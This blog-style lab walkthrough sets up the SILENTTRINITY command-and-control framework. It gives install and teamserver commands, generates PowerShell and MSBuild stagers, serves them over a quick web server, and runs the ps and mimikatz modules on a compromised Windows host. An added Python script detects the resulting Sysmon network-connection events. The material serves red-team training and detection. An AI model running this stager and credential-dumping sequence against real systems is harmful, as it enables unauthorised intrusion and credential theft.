SILENTTRINITY (ST) made the news a few times in July 2019, and I wanted to see what all the fuss was about. This article has enough information to get ST installed, the teamserver operational, and a client connected to the teamserver. Once all that is out of the way, we’ll go for the goods.
Pre-Reqs for Following Along
- Digital Ocean $10/mo Ubuntu 19.10 Node
- Windows box[es] for pillaging
- Permissions to perform said pillaging
Each time I install ST there seem to be issues with at least one install directive, but at this point my stable install looks like the following.
git clone https://github.com/byt3bl33d3r/SILENTTRINITY
apt update && apt upgrade
apt install python3.7 python3.7-dev python3-pip
sudo -H pip3 install -U pipenv
cd SILENTTRINITY
pip3 install -r requirements.txt
pipenv install && pipenv shell
The Article I Wrote About SILENTTRINITY
Our story begins with a standard user on a Windows domain who we are going to assume clicked a link or executed an HTA. This user has appropriate (non-admin) privileges and as such limits our ability to easily escalate privileges. From there, the story provides some basic usage and hopefully expands the reader’s and my own knowledge.
Assuming the install went well, let’s get the server up and running. For opsec, we’d do things like ensure the server runs behind a categorized domain name, limit access to the listening services with firewall restrictions, and stay aware that Listeners can be dangerous and may themselves contain vulnerabilities (see the Teamserver security link at the end).
python st.py teamserver --port 81 10.10.98.228 BadPassword123
Once executed, we should get back the certificate fingerprint and a confirmation that the server is running.
Next, we need to get the client side connected. There are a couple of ways to go about this. In red team ops, the server would be running on some cloud service or VPS and we’d connect to it from behind our own proxies, VPNs, firewalls, whathaveyou. In this case, I’m just going to open another tmux pane and connect to the server locally.
There’s a lot going on in the next screenshot. It includes the pwd (/opt/SILENTTRINITY) and the preparation of a virtual environment so as not to tamper with all the other Python-related dependencies on the local system.
The commands used above, and the additional client connection to the Teamserver are below.
pwd
pipenv install && pipenv shell
python st.py client wss://aptclass:BadPassword123@10.10.98.228:81
Once connected, the splash screen:
From here, we need to fire up a Listener.
listeners use https
The listener’s options menu for HTTPS:
The stagers / powershell options configuration and my favorite context-based tab completion implementation ever can be seen below.
But really — I just want the fastest way to malware which was:
stagers powershell generate https
stagers msbuild generate https
The stager.ps1 file was dropped into my /opt/SILENTTRINITY/ directory and was basically ready for execution. python -m http.server works great to stand up a quick, browsable web server. I also generated a stager.xml for MSBuild, which is quieter and has fewer optics focused in its general direction, though that is changing too.
python -m http.server
Then, from the client, we snag the stager files.
…and execute them. Full disclosure: the PowerShell stager got flagged. The stager.xml file also got flagged. But, the msbuild.xml was “built” with the following command:
And, we get our session.
Here, like the Twilight Zone, I control the SIEM, sysmon deployment, the horizontal, and the vertical, and thus, I don’t care if I catch myself. In fact, I hope to. Which, with Sysmon is exceptionally easy.
We next find the relevant Sysmon events by filtering our endpoint Sysmon logs in Kibana for event_id:3 (network connection). As seen below, we have the likely popped host, the process, and the destination IP address.
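As an added example (not from the original article or the ST project), here is a small Python triage script that applies the same event_id:3 filter offline to constructed Winlogbeat-style Sysmon records and groups outbound connections made by the binaries the stagers above rely on; the JSON field names, hostnames, users and the listener port 443 are assumptions.

```python
import json
import ntpath
from collections import Counter

# Constructed Sysmon Event ID 3 (network connection) records, roughly in the
# one-JSON-object-per-line shape Winlogbeat ships to Kibana. Field names are
# an assumption; real deployments may nest or rename them.
SAMPLE_LOG = r"""
{"event_id": 3, "computer_name": "WS01.lab.local", "event_data": {"Image": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\MSBuild.exe", "User": "LAB\\alice", "DestinationIp": "10.10.98.228", "DestinationPort": "443"}}
{"event_id": 3, "computer_name": "WS01.lab.local", "event_data": {"Image": "C:\\Program Files\\Mozilla Firefox\\firefox.exe", "User": "LAB\\alice", "DestinationIp": "93.184.216.34", "DestinationPort": "443"}}
{"event_id": 1, "computer_name": "WS01.lab.local", "event_data": {"Image": "C:\\Windows\\System32\\notepad.exe", "User": "LAB\\alice"}}
{"event_id": 3, "computer_name": "WS01.lab.local", "event_data": {"Image": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\MSBuild.exe", "User": "LAB\\alice", "DestinationIp": "10.10.98.228", "DestinationPort": "443"}}
{"event_id": 3, "computer_name": "WS02.lab.local", "event_data": {"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "User": "LAB\\bob", "DestinationIp": "10.10.98.228", "DestinationPort": "443"}}
"""

# Binaries that rarely need outbound network access on a workstation but which
# the stagers above depend on (MSBuild.exe for stager.xml, powershell.exe for stager.ps1).
LOLBIN_IMAGES = {"msbuild.exe", "powershell.exe", "mshta.exe"}


def parse_events(log_text):
    """Yield only Sysmon Event ID 3 records; skip blank or malformed lines."""
    for line in log_text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            rec = json.loads(line)
        except json.JSONDecodeError:
            continue  # a truncated shipper line should not abort triage
        if rec.get("event_id") == 3:
            yield rec


def find_suspicious_connections(log_text):
    """Return sorted (host, user, image, dest_ip, dest_port, count) tuples for LOLBin egress."""
    counts = Counter()
    for rec in parse_events(log_text):
        d = rec.get("event_data", {})
        # ntpath handles Windows paths correctly even when this runs on Linux.
        image = ntpath.basename(d.get("Image", "")).lower()
        if image in LOLBIN_IMAGES:
            key = (rec.get("computer_name"), d.get("User"), image,
                   d.get("DestinationIp"), d.get("DestinationPort"))
            counts[key] += 1  # repeated hits to one destination look like a beacon
    return sorted((*key, n) for key, n in counts.items())


if __name__ == "__main__":
    for hit in find_suspicious_connections(SAMPLE_LOG):
        print(hit)
```

The repeated MSBuild.exe connection from WS01 to the teamserver address is the same picture the Kibana filter gives, with the per-destination count adding a cheap beacon indicator.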
But, we might as well keep exploring, right? Egypt always told me he’d start any meterpreter session by validating running processes and process integrity because these things matter. If we can’t read all the process details, we aren’t admin and asking can be an IoC.
Let’s jump into the modules section and run ps.
modules
use boo/ps
run <session ID>
It’s already game over for this system. We have a privileged shell.
Let’s do it.
use boo/mimikatz
run <session ID>
Cheers all and thanks for reading!
- ST: https://github.com/byt3bl33d3r/SILENTTRINITY
- ZDNet: https://www.zdnet.com/article/croatian-government-targeted-by-mysterious-hackers/
- SCMag: https://www.scmagazineuk.com/entirely-new-malware-silenttrinity-attacks-croatian-government/article/1590225
- Teamserver security: https://github.com/byt3bl33d3r/SILENTTRINITY/wiki/Teamserver-Security-Considerations-Guidelines